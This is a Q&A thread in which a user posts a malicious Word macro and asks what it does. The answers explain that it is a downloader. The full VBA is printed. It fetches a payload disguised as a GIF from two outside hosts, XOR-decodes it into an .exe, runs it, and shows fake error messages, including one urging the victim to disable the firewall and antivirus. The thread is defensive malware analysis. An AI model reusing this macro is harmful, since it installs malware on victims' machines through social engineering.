# A spammer/attacker/bad person sent an MS word doc that contained a big macro. Can someone understand what this macro does?

Tags: vba

Sample context to let stack over flow post this question.

Here he tries to combine its working for mac and windows I suppose.

```
#If VBA7 And Win64 Then
Private Declare PtrSafe Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
```

this attacker seems to open this doc.

```
Sub Document_Open()

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte

#If Win64 Then
Dim kmvbf As LongLong
#Else
Dim kmvbf As Long
#End If
```

What is this doing?

```
ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100

Set myRange = ActiveDocument.Content

With myRange.Font
 .Name = "Verdana"
 .Size = 14
End With

ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & "     Please wait..."
```

Is this supposed to damage my computer?

```
DoEvents
DoEvents
DoEvents
DoEvents

wyqud = lwyfu
zdwie = Gshwjf(0, "http://adenzia.ch/_vti_cnf/bug.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)

If zdwie <> 0 And rufhd < 152143 Then
zdwie = Gshwjf(0, "http://kingofstreets.de/class/meq.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
End If


If rufhd < 154743 Then
ActiveDocument.Content.Delete
MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
Exit Sub
End If

bldos = FreeFile
Open wyqud For Binary As #bldos
ReDim mufid(0 To LOF(bldos) - 1)
Get #bldos, , mufid()
Close #bldos

Call duwif(mufid())
```

Dont know what this is doing

```
wyqud = Left(wyqud, Len(wyqud) - 3)
wyqud = wyqud & "exe"

bldos = FreeFile
Open wyqud For Binary As #bldos
Put #bldos, , mufid()
Close #bldos


kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

ActiveDocument.Content.Delete
MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"

End Sub
```

cleverly written unreadable code.

```
Public Function lwyfu() As String
  Dim djfie As String * 512
  Dim pwifu As String * 576
  Dim dwuf As Long
  Dim wefkg As String
  dwuf = Uhdwuud(512, djfie)
  If (dwuf > 0 And dwuf < 512) Then
    dwuf = Uhduiuwd(djfie, 0, 0, pwifu)
    If dwuf <> 0 Then
        wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
    End If
    lwyfu = wefkg
  End If
End Function
```

another function

```
Public Sub duwif(mufid() As Byte)
  Dim dfety As Long
  Dim bvjwi As Long
  Dim wbdys As Long
  Dim dvywi(256) As Byte
  Dim wdals As Long
  Dim dwiqh As Long


  bvjwi = UBound(mufid) + 1

  For dfety = 10 To 265
    dvywi(dfety - 10) = mufid(dfety)
  Next

  wdals = UBound(dvywi) + 1

  dwiqh = 0
  For dfety = 266 To (bvjwi - 267)
    mufid(dfety - 266) = mufid(dfety) Xor dvywi(dwiqh)
    dwiqh = dwiqh + 1

    If dwiqh = (wdals - 1) Then
        dwiqh = 0
    End If
  Next

  ReDim Preserve mufid(bvjwi - 267)

End Sub
```

end of the macro

Comment: Without looking too closely, the purpose is 99% likely to be to download malware from the site listed in the code and install/execute it on your PC (assuming you have a PC...)  It uses Windows API calls and so will not work on a Mac.  The conditional compilation is to deal with 32-bit PC vs 64-bit.

Comment: It downloads a file from one address or another, reads it in memory, transforms/unencrypts it with something xor-based, writes the unencrypted binary to disk with an `exe` extension, passes the path to it to `explorer.exe` to be executed and displays a bogus message about the document being corrupted. If you saw that message the above sequence of steps worked fine for you.

Answer (score 1):

The comments are correct; the macro downloads malware/spyware and executes it.

It tries both GIF URLs (and even prompts the user to disable their firewall/AV if the download fails). The two GIFs are identical (same SHA256 checksum), they have the appropriate GIF header block ("GIF89a"), and they even have some of the bytes describing what *should* be the image data.

The macro uses the `duwif()` subroutine (line 105) to extract the executable binary from the downloaded GIF. It stores that binary in a temp file, the reference for which is created by the `lwyfu()` function (line 90).

The macro then executes the binary on line 82:

```
kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
```

You can modify the macro to remove/comment the execution statement and insert something harmless. For example:

```
REM kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
MsgBox wyqud
```

This opens a message box with the path to the extracted binary instead of executing it.

The binary checksum is (SHA256)

> 55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd

Several anti-virus providers flag this file as malware and an automated analysis shows some suspicious behavior.

- [VirusTotal.com Report](https://www.virustotal.com/en/file/55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd/analysis/)
- [Hybrid-Analysis.com Report](https://www.hybrid-analysis.com/sample/55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd)